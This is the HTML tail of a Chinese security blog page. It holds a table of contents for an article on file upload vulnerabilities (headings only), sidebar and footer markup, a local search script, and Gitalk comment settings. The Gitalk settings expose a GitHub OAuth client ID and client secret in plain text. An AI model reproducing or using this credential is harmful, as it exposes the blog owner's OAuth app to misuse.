class="fas fa-angle-left"></i></span><span class="paginator-prev__text">Ubuntu中iptables配置</span></a></div><div class="paginator-next"><a class="paginator-next__link" href="/2021/04/12/GKCTF2020-%E8%80%81%E5%85%AB%E5%B0%8F%E8%B6%85%E5%B8%82%E5%84%BF/"><span class="paginator-prev__text">GKCTF2020-老八小超市儿</span><span class="paginator-next__icon"><i class="fas fa-angle-right"></i></span></a></div></nav></footer></div></div><div class="comments" id="comments"><div id="gitalk-container"></div></div></div><div class="sidebar-wrap" id="sidebar-wrap"><aside class="sidebar" id="sidebar"><div class="sidebar-nav"><span class="sidebar-nav-toc current">文章目录</span><span class="sidebar-nav-ov">站点概览</span></div><section class="sidebar-toc"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E"><span class="toc-number">1.</span> <span class="toc-text">
          文件上传漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-%E5%89%8D%E8%A8%80"><span class="toc-number">1.1.</span> <span class="toc-text">
          1. 前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-%E5%89%8D%E7%AB%AF%E6%A3%80%E6%B5%8B"><span class="toc-number">1.2.</span> <span class="toc-text">
          2. 前端检测</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-%E5%90%8E%E7%AB%AF%E6%A3%80%E6%B5%8B"><span class="toc-number">1.3.</span> <span class="toc-text">
          3. 后端检测</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#3-1-%E6%A3%80%E6%B5%8BContent-type"><span class="toc-number">1.3.1.</span> <span class="toc-text">
          3.1 检测Content-type</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-2-%E6%A3%80%E6%B5%8B%E6%96%87%E4%BB%B6%E5%A4%B4%E5%88%A4%E6%96%AD%E6%96%87%E4%BB%B6%E7%B1%BB%E5%9E%8B"><span class="toc-number">1.3.2.</span> <span class="toc-text">
          3.2 检测文件头判断文件类型</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-3-%E6%A3%80%E6%B5%8B%E6%96%87%E4%BB%B6%E6%89%A9%E5%B1%95%E5%90%8D"><span class="toc-number">1.3.3.</span> <span class="toc-text">
          3.3 检测文件扩展名</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#3-3-1-%E9%BB%91%E5%90%8D%E5%8D%95%E6%A3%80%E6%B5%8B"><span class="toc-number">1.3.3.1.</span> <span class="toc-text">
          3.3.1 黑名单检测</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3-3-2-%E7%99%BD%E5%90%8D%E5%8D%95%E6%A3%80%E6%B5%8B"><span class="toc-number">1.3.3.2.</span> <span class="toc-text">
          3.3.2 白名单检测</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-4-%E6%A3%80%E6%B5%8B%E6%96%87%E4%BB%B6%E5%86%85%E5%AE%B9"><span class="toc-number">1.3.4.</span> <span class="toc-text">
          3.4 检测文件内容</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#3-4-1-%E6%96%87%E4%BB%B6%E5%86%85%E5%AE%B9%E6%9B%BF%E6%8D%A2"><span class="toc-number">1.3.4.1.</span> <span class="toc-text">
          3.4.1 文件内容替换</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3-4-2-%E5%9B%BE%E7%89%87%E4%BA%8C%E6%AC%A1%E6%B8%B2%E6%9F%93"><span class="toc-number">1.3.4.2.</span> <span class="toc-text">
          3.4.2 图片二次渲染</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E"><span class="toc-number">1.4.</span> <span class="toc-text">
          4. 解析漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#4-1-IIS%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E"><span class="toc-number">1.4.1.</span> <span class="toc-text">
          4.1 IIS解析漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#IIS6-0"><span class="toc-number">1.4.1.1.</span> <span class="toc-text">
          IIS6.0</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#IIS7-5"><span class="toc-number">1.4.1.2.</span> <span class="toc-text">
          IIS7.5</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-2-Apache%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E"><span class="toc-number">1.4.2.</span> <span class="toc-text">
          4.2 Apache解析漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E4%BD%8E%E7%89%88%E6%9C%ACapache%E6%89%A9%E5%B1%95%E5%90%8D%E8%A7%A3%E6%9E%90%E7%89%B9%E6%80%A7"><span class="toc-number">1.4.2.1.</span> <span class="toc-text">
          利用低版本apache扩展名解析特性</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#CVE-2017-15715"><span class="toc-number">1.4.2.2.</span> <span class="toc-text">
          CVE-2017-15715</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-3-00%E6%88%AA%E6%96%AD"><span class="toc-number">1.4.3.</span> <span class="toc-text">
          4.3 %00截断</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-5-htaccess%E8%A7%A3%E6%9E%90"><span class="toc-number">1.4.4.</span> <span class="toc-text">
          4.5 .htaccess解析</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#5-%E6%80%BB%E7%BB%93"><span class="toc-number">1.5.</span> <span class="toc-text">
          5. 总结</span></a></li></ol></li></ol></section><!-- ov = overview--><section class="sidebar-ov hide"><div class="sidebar-ov-author"><div class="sidebar-ov-author__avatar"><img class="sidebar-ov-author__avatar_img" src="/images/logo.jpg" alt="avatar"></div><p class="sidebar-ov-author__text">Sculptor</p></div><div class="sidebar-ov-social"><a class="sidebar-ov-social-item" href="https://github.com/Sculptor-liu/" target="_blank" rel="noopener" data-popover="Github" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-github"></i></span></a><a class="sidebar-ov-social-item" href="https://blog.csdn.net/weixin_45798017" target="_blank" rel="noopener" data-popover="social.csdn" data-popover-pos="up"><span class="sidebar-ov-social-item__icon">csdn</span></a></div><div class="sidebar-ov-feed"><span class="sidebar-ov-feed-email"><a class="sidebar-ov-feed-email__link" href="https://mail.qq.com/" target="_blank" rel="noopener"><span class="sidebar-ov-feed-email__icon"><i class="fas fa-envelope"></i></span><span>Email 订阅</span></a></span></div><div class="sidebar-ov-state"><a class="sidebar-ov-state-item sidebar-ov-state-item--posts" href="/archives/"><div class="sidebar-ov-state-item__count">73</div><div class="sidebar-ov-state-item__name">归档</div></a><a class="sidebar-ov-state-item sidebar-ov-state-item--categories" href="/categories/"><div class="sidebar-ov-state-item__count">7</div><div class="sidebar-ov-state-item__name">分类</div></a><a class="sidebar-ov-state-item sidebar-ov-state-item--tags" href="/tags/"><div class="sidebar-ov-state-item__count">49</div><div class="sidebar-ov-state-item__name">标签</div></a></div><div class="sidebar-ov-cc"><a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh-cn" target="_blank" rel="noopener" data-popover="知识共享许可协议" data-popover-pos="up"><img src="/images/cc-by-nc-sa.svg"></a></div></section><div class="sidebar-reading"><div class="sidebar-reading-info"><span class="sidebar-reading-info__text">你已阅读了 </span><span class="sidebar-reading-info__num">0</span></div><div class="sidebar-reading-line"></div></div></aside></div><div class="clearfix"></div></div></main><footer class="footer" id="footer"><div class="footer-inner"><div><span>Copyright © 2021</span><span class="footer__icon"><i class="fas fa-heart"></i></span><span>Sculptor</span></div><div><span>由 <a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a> 强力驱动</span><span> v5.1.1</span><span class="footer__devider">|</span><span>主题 - <a href="https://github.com/liuyib/hexo-theme-stun/" title="Stun" target="_blank" rel="noopener">Stun</a></span><span> v2.1.1</span></div><div class="busuanzi"><span class="busuanzi-siteuv"><span class="busuanzi-siteuv__icon"><i class="fas fa-user"></i></span><span class="busuanzi-siteuv__info">访问人数</span><span class="busuanzi-siteuv__value" id="busuanzi_value_site_uv"></span></span><span class="busuanzi-sitepv"><span class="busuanzi-siteuv__icon"><i class="fas fa-eye"></i></span><span class="busuanzi-siteuv__info">浏览总量</span><span class="busuanzi-siteuv__value" id="busuanzi_value_site_pv"></span></span></div></div></footer><div class="loading-bar" id="loading-bar"><div class="loading-bar__progress"></div></div><div class="back2top" id="back2top"><span class="back2top__icon"><i class="fas fa-rocket"></i></span></div></div><div class="search-mask"></div><div class="search-popup"><span class="search-close"></span><div class="search-input"><input placeholder="搜索文章（支持多关键词，请用空格分隔）"></div><div class="search-results"></div></div><script src="https://cdn.jsdelivr.net/npm/jquery@v3.4.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.ui.min.js"></script><script src="https://cdn.jsdelivr.net/npm/social-share.js@1.0.16/dist/js/social-share.min.js"></script><script>function initSearch() {
  var isXML = true;
  var search_path = 'search.xml';

  if (!search_path) {
    search_path = 'search.xml';
  } else if (/json$/i.test(search_path)) {
    isXML = false;
  }

  var path = '/' + search_path;
  $.ajax({
    url: path,
    dataType: isXML ? 'xml' : 'json',
    async: true,
    success: function (res) {
      var datas = isXML ? $('entry', res).map(function () {
        // 将 XML 转为 JSON
        return {
          title: $('title', this).text(),
          content: $('content', this).text(),
          url: $('url', this).text()
        };
      }).get() : res;
      var $input = $('.search-input input');
      var $result = $('.search-results');
      // 搜索对象（标题、内容）的权重，影响显示顺序
      var WEIGHT = { title: 100, content: 1 };
      var searchPost = function () {
        var searchText = $input.val().toLowerCase().trim();
        // 根据空白字符分隔关键字
        var keywords = searchText.split(/[\s]+/);
        // 搜索结果
        var matchPosts = [];

        // 有多个关键字时，将原文字整个保存下来
        if (keywords.length > 1) {
          keywords.push(searchText);
        }
        // 防止未输入字符时搜索
        if (searchText.length > 0) {
          datas.forEach(function (data) {
            var isMatch  = false;
            // 没有标题的文章使用预设的 i18n 变量代替
            var title = (data.title && data.title.trim()) || '[ 文章无标题 ]';
            var titleLower = title && title.toLowerCase();
            // 删除 HTML 标签 和 所有空白字符
            var content = data.content && data.content.replace(/<[^>]+>/g, '');
            var contentLower = content && content.toLowerCase();
            // 删除重复的 /
            var postURL = data.url && decodeURI(data.url).replace(/\/{2,}/g, '/');
            // 标题中匹配到的关键词
            var titleHitSlice = [];
            // 内容中匹配到的关键词
            var contentHitSlice = [];

            keywords.forEach(function (keyword) {
              /**
              * 获取匹配的关键词的索引
              * @param {String} keyword 要匹配的关键字
              * @param {String} text 原文字
              * @param {Boolean} caseSensitive 是否区分大小写
              * @param {Number} weight 匹配对象的权重。权重大的优先显示
              * @return {Array}
              */
              function getIndexByword (word, text, caseSensitive, weight) {
                if (!word || !text) {
                  return [];
                };

                var startIndex = 0; // 每次匹配的开始索引
                var index = -1;     // 匹配到的索引值
                var result = [];    // 匹配结果

                if (!caseSensitive) {
                  word = word.toLowerCase();
                  text = text.toLowerCase();
                }

                while((index = text.indexOf(word, startIndex)) !== -1) {
                  var hasMatch = false;
                  // 索引位置相同的关键词，保留长度较长的
                  titleHitSlice.forEach(function (hit) {
                    if (hit.index === index && hit.word.length < word.length) {
                      hit.word = word;
                      hasMatch = true;
                    }
                  });
                  startIndex = index + word.length;
                  !hasMatch && result.push({ index: index, word: word, weight: weight });
                }
                return result;
              }
              titleHitSlice = titleHitSlice.concat(getIndexByword(keyword, titleLower, false, WEIGHT.title));
              contentHitSlice = contentHitSlice.concat(getIndexByword(keyword, contentLower, false, WEIGHT.content));
            });

            var hitTitle = titleHitSlice.length;
            var hitContent = contentHitSlice.length;

            if (hitTitle > 0 || hitContent > 0) {
              isMatch = true;
            }
            if (isMatch) {
              ;[titleHitSlice, contentHitSlice].forEach(function (hit) {
                // 按照匹配文字的索引的递增顺序排序
                hit.sort(function (left, right) {
                  return left.index - right.index;
                });
              });
              /**
              * 给文本中匹配到的关键词添加标记，从而进行高亮显示
              * @param {String} text 原文本
              * @param {Array} hitSlice 匹配项的索引信息
              * @param {Number} start 开始索引
              * @param {Number} end 结束索引
              * @return {String}
              */
              function highlightKeyword (text, hitSlice, start, end) {
                if (!text || !hitSlice || !hitSlice.length) {
                  return;
                }

                var result = '';
                var startIndex = start;
                var endIndex = end;
                hitSlice.forEach(function (hit) {
                  if (hit.index < startIndex) {
                    return;
                  }

                  var hitWordEnd = hit.index + hit.word.length;
                  result += text.slice(startIndex, hit.index);
                  result += '<b>' + text.slice(hit.index, hitWordEnd) + '</b>';
                  startIndex = hitWordEnd;
                });
                result += text.slice(startIndex, endIndex);
                return result;
              }

              var postData = {};
              // 文章总的搜索权重
              var postWeight = titleHitSlice.length * WEIGHT.title + contentHitSlice.length * WEIGHT.content;
              // 标记匹配关键词后的标题
              var postTitle = highlightKeyword(title, titleHitSlice, 0, title.length) || title;
              // 标记匹配关键词后的内容
              var postContent;
              // 显示内容的长度
              var SHOW_WORD_LENGTH = 200;
              // 命中关键词前的字符显示长度
              var SHOW_WORD_FRONT_LENGTH = 20;
              var SHOW_WORD_END_LENGTH = SHOW_WORD_LENGTH - SHOW_WORD_FRONT_LENGTH;

              // 截取匹配的第一个字符，前后共 200 个字符来显示
              if (contentHitSlice.length > 0) {
                var firstIndex = contentHitSlice[0].index;
                var start = firstIndex > SHOW_WORD_FRONT_LENGTH ? firstIndex - SHOW_WORD_FRONT_LENGTH : 0;
                var end = firstIndex + SHOW_WORD_END_LENGTH;
                postContent = highlightKeyword(content, contentHitSlice, start, end);
              } else { // 未匹配到内容，直接截取前 200 个字符来显示
                postContent = content.slice(0, SHOW_WORD_LENGTH);
              }
              postData.title = postTitle;
              postData.content = postContent;
              postData.url = postURL;
              postData.weight = postWeight;
              matchPosts.push(postData);
            }
          });
        }

        var resultInnerHtml = '';
        if (matchPosts.length) {
          // 按权重递增的顺序排序，使权重大的优先显示
          matchPosts.sort(function (left, right) {
            return right.weight - left.weight;
          });
          resultInnerHtml += '<ul>';
          matchPosts.forEach(function (post) {
            resultInnerHtml += '<li><a class="search-results-title" href="' + post.url + '">';
            resultInnerHtml += post.title;
            resultInnerHtml += '</a><div class="search-results-content">';
            resultInnerHtml += post.content;
            resultInnerHtml += '</div></li>';
          });
          resultInnerHtml += '</ul>';
        } else {
          resultInnerHtml += '<div class="search-results-none"><i class="far fa-meh"></i></div>';
        }
        $result.html(resultInnerHtml);
      };
      $input.on('input', searchPost);
      $input.on('keyup', function (e) {
        if (e.keyCode === Stun.utils.codeToKeyCode('Enter')) {
          searchPost();
        }
      });
    }
  });
}

function closeSearch () {
  $('body').css({ overflow: 'auto' });
  $('.search-popup').css({ display: 'none' });
  $('.search-mask').css({ display: 'none' });
}

window.addEventListener('DOMContentLoaded', function () {
  Stun.utils.pjaxReloadLocalSearch = function () {
    $('.header-nav-search').on('click', function (e) {
      e.stopPropagation();
      $('body').css('overflow', 'hidden');
      $('.search-popup')
        .velocity('stop')
        .velocity('transition.expandIn', {
          duration: 300,
          complete: function () {
            $('.search-popup input').focus();
          }
        });
      $('.search-mask')
        .velocity('stop')
        .velocity('transition.fadeIn', {
          duration: 300
        });

      initSearch();
    });
    $('.search-mask, .search-close').on('click', function () {
      closeSearch();
    });
    $(document).on('keydown', function (e) {
      // Escape <=> 27
      if (e.keyCode === Stun.utils.codeToKeyCode('Escape')) {
        closeSearch();
      }
    });
  };

  Stun.utils.pjaxReloadLocalSearch();
}, false);</script><script src="https://cdn.jsdelivr.net/gh/sukkaw/busuanzi@latest/bsz.pure.mini.js" async></script><script src="https://cdn.jsdelivr.net/npm/gitalk@latest/dist/gitalk.min.js"></script><script src="https://cdn.jsdelivr.net/npm/js-md5@latest/src/md5.min.js"></script><script>function loadGitalk () {
  if (!document.getElementById('gitalk-container')) {
    return;
  }

  var gitalk = new Gitalk({
    id: md5(window.location.pathname.slice(1)),
    clientID: '28f6b94423100cc8a01d',
    clientSecret: '812ec412a6abb31e41feedc3fa3ba97eefa1a882',
    repo: 'Sculptor-liu.github.io',
    owner: 'Sculptor-liu',
    admin: ['Sculptor-liu'],
    distractionFreeMode: 'false',
    language: 'zh-CN'
  });
  gitalk.render('gitalk-container');
}

if (false) {
  loadGitalk();
} else {
  window.addEventListener('DOMContentLoaded', loadGitalk, false);
}</script><script src="/js/utils.js?v=2.1.1"></script><script src="/js/stun-boot.js?v=2.1.1"></script><script src="/js/scroll.js?v=2.1.1"></script><script src="/js/header.js?v=2.1.1"></script><script src="/js/sidebar.js?v=2.1.1"></script><script type="application/json" src="/search.xml"></script></body></html>